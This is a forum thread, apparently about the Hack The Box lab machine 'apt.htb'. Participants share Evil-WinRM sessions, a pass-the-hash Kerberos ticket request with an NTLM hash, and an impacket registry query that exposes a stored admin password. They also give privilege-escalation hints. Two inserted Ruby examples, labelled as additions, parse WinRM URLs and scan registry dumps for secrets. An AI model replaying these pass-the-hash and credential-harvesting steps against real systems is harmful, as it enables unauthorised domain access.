TUTORIAL apt.htb
by ARhOmOuTEd - November 02, 2020 at 04:46 PM
#37
I needed more coffee and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)
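
The `URI::InvalidURIError` in the post above comes from an IPv6 literal placed in a URL without brackets, so the parser cannot tell the address colons from the port separator. The following Ruby example is added here and is not part of the original post or of Evil-WinRM's code; `wsman_endpoint` and `parses?` are hypothetical helper names, and it builds the WinRM endpoint so that it parses:

```ruby
require 'ipaddr'
require 'uri'

# Hypothetical helper: build a WinRM (WS-Management) endpoint URL.
# RFC 3986 requires IPv6 literals in the authority to be wrapped in [ ].
def wsman_endpoint(host, port = 5985, scheme: 'http')
  bare = host.delete_prefix('[').delete_suffix(']')
  ipv6 = begin
    IPAddr.new(bare).ipv6?
  rescue IPAddr::Error
    false # not an IP literal, so treat it as a hostname
  end
  authority = ipv6 ? "[#{bare}]" : bare
  # URI.parse raises URI::InvalidURIError if the result is still malformed.
  URI.parse("#{scheme}://#{authority}:#{port}/wsman").to_s
end

# Hypothetical helper: true when Ruby's URI parser accepts the string.
def parses?(url)
  URI.parse(url)
  true
rescue URI::InvalidURIError
  false
end

if __FILE__ == $PROGRAM_NAME
  addr = 'dead:beef::b885:d62a:d679:573f' # address from the error message above
  puts parses?("http://#{addr}:5985/wsman") # unbracketed form from the error
  puts wsman_endpoint(addr)
  puts wsman_endpoint('apt.htb')
end
```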
#38
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee  and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)

How did you find the username? Check my post on the last page
#39
(December 01, 2020 at 11:00 PM)runos Wrote:
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee  and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)

How did you find the username? Check my post on the last page

using rpcclient and the henry.vinson hash.

I am stuck with the root part. It seems the AV kills winPEAS or somehow it does not run.

Any hints ?

:)
#40
(December 01, 2020 at 11:45 PM)bodiesplus Wrote:
(December 01, 2020 at 11:00 PM)runos Wrote:
(December 01, 2020 at 08:33 PM)bodiesplus Wrote: I needed more coffee  and -p- :D

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"

Error: Exiting with code 1

so

.... -i apt.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

:)

:)

How did you find the username? Check my post on the last page

using rpcclient and the henry.vinson hash.

I am stuck with the root part. It seems the AV kills winPEAS or somehow it does not run.

Any hints ?

:)

Can you explain how exactly you found that you should use henry.vinson user?
#41
Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Among the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


Use winrm to log in to APT
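
For defenders, the finding in the post above is a cleartext credential stored as a string value in a user hive. The following Ruby example is added here and is not part of the original post or of impacket; it scans a registry export in the layout shown above and reports credential-like string values without echoing the data. The value-name pattern, the helper name and the sample dump are constructed assumptions:

```ruby
# Value names that usually indicate a stored secret (assumed list, extend as needed).
SECRET_NAME = /pass(word|wd)?|pwd|secret|token|api[_-]?key/i

# Parse recursive registry query output: key lines are unindented,
# value lines are indented "Name  TYPE  data".
# Returns one finding per suspicious string value, without the secret itself.
def cleartext_secret_findings(dump)
  key = nil
  findings = []
  dump.each_line do |line|
    line = line.chomp
    next if line.strip.empty?
    if line =~ /\A\s+(\S.*?)\s+(REG_[A-Z_]+)\s*(.*)\z/
      name, type, data = $1, $2, $3
      # Only string types can hold a readable password.
      next unless %w[REG_SZ REG_EXPAND_SZ].include?(type)
      next unless name =~ SECRET_NAME && !data.empty?
      findings << { key: key, value: name, type: type, length: data.length }
    else
      key = line.strip # remember which key the following values belong to
    end
  end
  findings
end

# Constructed sample input, modelled on the layout in the post above.
SAMPLE_DUMP = [
  "\\Software\\ExampleApp\\",
  "\tUserName\tREG_SZ\tsvc_example",
  "\tPassWord\tREG_SZ\tnot-a-real-secret",
  "\tRetryCount\tREG_DWORD\t0x3",
  "\\Software\\Microsoft\\",
  "\tPasswordPolicyBlob\tREG_BINARY\t0100"
].join("\n")

if __FILE__ == $PROGRAM_NAME
  cleartext_secret_findings(SAMPLE_DUMP).each do |f|
    puts "#{f[:key]}#{f[:value]} (#{f[:type]}, #{f[:length]} chars)"
  end
end
```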
#42
Has anyone found a walkthrough for this box yet?
#43
Hi guys, I need help rooting this box. I am stuck on user
#44
(December 20, 2020 at 02:21 AM)Buttmuncher Wrote: Has anyone found a walkthrough for this box yet?

C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

... good luck ... :)
#45
I found the parameter
AuditPolicySD
REG_BINARY
01000000D08C9DDF0115D1118.....
But I did not understand how to decrypt it
I can use powershell convertto-securestring, but I need the key. Where do I get it?

Or is it a rabbithole?
#46
(December 20, 2020 at 02:21 AM)Buttmuncher Wrote: Has anyone found a walkthrough for this box yet?
no, but what do you want to know?

(December 26, 2020 at 04:04 PM)djstoks Wrote: I found the parameter
AuditPolicySD     
REG_BINARY   
01000000D08C9DDF0115D1118.....
But I did not understand how to decrypt it
I can use powershell convertto-securestring, but I need the key. Where do I get it?

Or is it a rabbithole?
This is a rabbit hole; it's about NTLMv1, as you can see in the consolehost_history.txt
#47
(December 27, 2020 at 09:25 AM)ARhOmOuTEd Wrote: no, but what do you want to know?

well, a walkthrough really. you know, things like the wordlists people used etc.
#48
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Among the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


Use winrm to log in to APT

Nice, do you know how to priv esc on this machine?
